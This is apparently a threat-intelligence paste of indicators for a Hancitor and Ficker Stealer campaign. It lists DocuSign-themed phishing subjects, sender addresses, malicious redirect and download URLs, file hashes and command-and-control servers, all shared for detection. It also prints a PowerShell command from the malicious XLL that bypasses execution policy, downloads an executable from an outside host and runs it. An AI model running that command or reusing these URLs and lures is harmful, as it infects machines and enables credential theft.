View difference between Paste ID: <a href="/YwBxTDwX">YwBxTDwX</a> and <a href="/kmUJ3pX6">kmUJ3pX6</a>

THREAT IDENTIFICATION:  HANCITOR / FICKER STEALER
1		THREAT IDENTIFICATION: HANCITOR / FICKER STEALER
2
3		HANCITOR BUILD NUMBER
4		BUILD=0707in2_wvcr
5
6		SUBJECTS OBSERVED
7		You got invoice from DocuSign Electronic Service
8		You got invoice from DocuSign Electronic Signature Service
9		You got invoice from DocuSign Service
10		You got invoice from DocuSign Signature Service
11		You got notification from DocuSign Electronic Service
12		You got notification from DocuSign Electronic Signature Service
13		You got notification from DocuSign Service
14		You got notification from DocuSign Signature Service
15		You received invoice from DocuSign Electronic Service
16		You received invoice from DocuSign Electronic Signature Service
17		You received invoice from DocuSign Service
18		You received invoice from DocuSign Signature Service
19		You received notification from DocuSign Electronic Service
20		You received notification from DocuSign Electronic Signature Service
21		You received notification from DocuSign Service
22		You received notification from DocuSign Signature Service
23
24		SENDERS OBSERVED
25		[email protected]
26		[email protected]
27		[email protected]
28		[email protected]
29		[email protected]
30		[email protected]
31		[email protected]
32		[email protected]
33		[email protected]
34		[email protected]
35		[email protected]
36		[email protected]
37		[email protected]
38		[email protected]
39		[email protected]
40		[email protected]
41		[email protected]
42		[email protected]
43		[email protected]
44		[email protected]
45		[email protected]
46		[email protected]
47		[email protected]
48		[email protected]
49		[email protected]
50		[email protected]
51		[email protected]
52		[email protected]
53		[email protected]
54		[email protected]
55		[email protected]
56		[email protected]
57		[email protected]
58		[email protected]
59		[email protected]
60		[email protected]
61		[email protected]
62		[email protected]
63
64		MALDOC PROXY DISTRIBUTION URLS
65		http://feedproxy.google.com/~r/aadrkvpwohr/~3/hvqIAWB8ZGo/legend.php
66		http://feedproxy.google.com/~r/aaigmlntaz/~3/zDMjq9cpjP0/purported.php
67		http://feedproxy.google.com/~r/agrfofpkhoi/~3/Nvuc4ZHoAuU/trafficked.php
68		http://feedproxy.google.com/~r/aoqdbq/~3/lgYeMYdoVFs/edelweiss.php
69		http://feedproxy.google.com/~r/bcoycuchq/~3/85TxsQt3Q1A/expatiate.php
70		http://feedproxy.google.com/~r/bfaiobxnn/~3/40BvVc5LU1I/nondestructive.php
71		http://feedproxy.google.com/~r/ccfhf/~3/YPVRRIvUyF0/detrition.php
72		http://feedproxy.google.com/~r/conikypz/~3/zYdenqefeFM/polemic.php
73		http://feedproxy.google.com/~r/eapqs/~3/PXLELUQiOIM/enabled.php
74		http://feedproxy.google.com/~r/eaxffuyn/~3/MPqSB8haPFM/pointedness.php
75		http://feedproxy.google.com/~r/efuzvpwwuw/~3/Ju_TpdCJw7o/trover.php
76		http://feedproxy.google.com/~r/ggwrkvfiz/~3/5AZsEWUuj0w/wrath.php
77		http://feedproxy.google.com/~r/gidppccnezk/~3/8yvHqCvJiiA/limp.php
78		http://feedproxy.google.com/~r/higcitfx/~3/rrnrD2uQluU/funny.php
79		http://feedproxy.google.com/~r/huwwygzkokv/~3/3N-X0bO5epU/isle.php
80		http://feedproxy.google.com/~r/igxzzrinx/~3/Z97ozNdjlSA/siderite.php
81		http://feedproxy.google.com/~r/kkyknzxqa/~3/OSA0nIazKI4/presumed.php
82		http://feedproxy.google.com/~r/lfmzx/~3/DIfbI5M9auQ/schoolmarm.php
83		http://feedproxy.google.com/~r/mezzzkrooh/~3/gM2AilSs-2U/witnesser.php
84		http://feedproxy.google.com/~r/oehvfutz/~3/J8P7yN6ucko/toothless.php
85		http://feedproxy.google.com/~r/ogitcfzsl/~3/5Psg9vP0R7k/sleekness.php
86		http://feedproxy.google.com/~r/oivbslq/~3/8sJ-OEQ-QKk/sinned.php
87		http://feedproxy.google.com/~r/puyhr/~3/c91Mx9dCypw/tuba.php
88		http://feedproxy.google.com/~r/qvdii/~3/lgxzfGdyDyo/greeting.php
89		http://feedproxy.google.com/~r/reibxjjfqv/~3/YHK3BGNsq0Q/tangibly.php
90		http://feedproxy.google.com/~r/rtiuexidp/~3/L0TOvxtMT4E/aboard.php
91		http://feedproxy.google.com/~r/sjsovniji/~3/j9cG3K3J4SU/interpretation.php
92		http://feedproxy.google.com/~r/slcqfyy/~3/IPa4MfWbIUs/practitioner.php
93		http://feedproxy.google.com/~r/sxdcbtwtun/~3/CKI5VDNqNpM/versification.php
94		http://feedproxy.google.com/~r/vmfctlny/~3/0kW56lAJalM/firmament.php
95		http://feedproxy.google.com/~r/vtvqpysqgjx/~3/sG4SsBpOZNM/monument.php
96		http://feedproxy.google.com/~r/wwenrdi/~3/ZVOWXtVkwCo/antimatter.php
97		http://feedproxy.google.com/~r/ymtonk/~3/e2Kt7bOAP10/cutlass.php
98
99		MALDOC REDIRECT DOWNLOAD URLS
100		http://an.nastena.lv/greeting.php
101		http://catface.us/expatiate.php
102		http://gbsports.theapplab.org/tuba.php
103		http://gbsports.theapplab.org/wrath.php
104		http://grecozenobi.com.ar/presumed.php
105		http://grecozenobi.com.ar/sinned.php
106		http://grecozenobi.com.ar/trover.php
107		http://greechip.net/polemic.php
108		http://gunsify.com/sleekness.php
109		http://homevault.co.uk/aboard.php
110		http://homevault.co.uk/enabled.php
111		http://jaxthemessenger.com/witnesser.php
112		http://maoptions.xyz/detrition.php
113		http://maoptions.xyz/monument.php
114		http://maoptions.xyz/trafficked.php
115		http://new.novapilates.com/versification.php
116		http://nextclickcorp.net/nondestructive.php
117		http://nextclickcorp.net/practitioner.php
118		http://pphc.welkinfortprojects.com/edelweiss.php
119		http://pphc.welkinfortprojects.com/limp.php
120		http://seatranscorp.com/cutlass.php
121		http://seatranscorp.com/purported.php
122		http://seatranscorp.com/toothless.php
123		http://sportsrunouts.com/antimatter.php
124		http://sportsrunouts.com/isle.php
125		http://sportsrunouts.com/tangibly.php
126		http://turquoisecoaching.co.uk/funny.php
127		http://turquoisecoaching.co.uk/pointedness.php
128		http://virfilms.in/interpretation.php
129		http://virfilms.in/siderite.php
130		http://vivo.com.pk/firmament.php
131		https://www.adstudiophotography.com/legend.php
132		https://www.adstudiophotography.com/schoolmarm.php
133
134		adstudiophotography.com
135		catface.us
136		grecozenobi.com.ar
137		greechip.net
138		gunsify.com
139		homevault.co.uk
140		jaxthemessenger.com
141		maoptions.xyz
142		nastena.lv
143		nextclickcorp.net
144		novapilates.com
145		seatranscorp.com
146		sportsrunouts.com
147		theapplab.org
148		turquoisecoaching.co.uk
149		virfilms.in
150		vivo.com.pk
151		welkinfortprojects.com
152
153		MALDOC XLL FILE HASHES
154		0708_891792481.xll
155		41e0318dfdb1c180a375a7efc712649e
156
157		MALDOC DOC FILE HASHES
158		46b5387cedf436ebd2c0800f2e8297e2
159		4bdfb6932eba2bb3cbce59a2bae3cee2
160		aec795705d76fe4e3a66adbace539656
161		b4144d8e8e735f9a24f8c6e043438077
162		d32db402317d36e8a207d5b5a71d6cac
163		e071a5ed02d41002303b7e5763bfb307
164
165		HANCITOR PAYLOAD DOWNLOAD URLS
166		(this proceeded from running the .xll file)
167		http://srand04rf.ru/92375234.xml
168		http://srand04rf.ru/08.jpg
169
170		HANCITOR PAYLOAD FILE HASH
171		(as usual, this was dropped after enabling macros in the .doc file)
172		niberius.dll
173		378d5008e351365908e039475b7180b0
174
175		POWERSHELL SCRIPT FROM OPENING THE XLL FILE
176		"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
177		poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg' -OuTfIle 'c:\Users\Public\snd32sys.exe';
178		sTart 'c:\Users\Public\snd32sys.exe'
179
180		(this proceeded from running the .xll file)
181		92375234.xml
182		71999a9d2f15e164c9b1fa926aa6444b
183
184		res32.hta (same hash)
185		71999a9d2f15e164c9b1fa926aa6444b
186		----------------------------------------
187		08.jpg
188		ed1921467f6784af6bdca40a06a541b5
189
190		snd32sys.exe (same hash)
191		ed1921467f6784af6bdca40a06a541b5
192
193		HANCITOR C2
194		http://anspossthrly.ru/8/forum.php
195		http://sudepallon.com/8/forum.php
196		http://thentabecon.ru/8/forum.php
197
198		FICKER STEALER DOWNLOAD URL
199		http://srand04rf.ru/7hfjsdfjks.exe
200
201		FICKER STEALER FILE HASH
202		7hfjsdfjks.exe
203		270c3859591599642bd15167765246e3
204
205		FICKER C2
206		http://pospvisis.com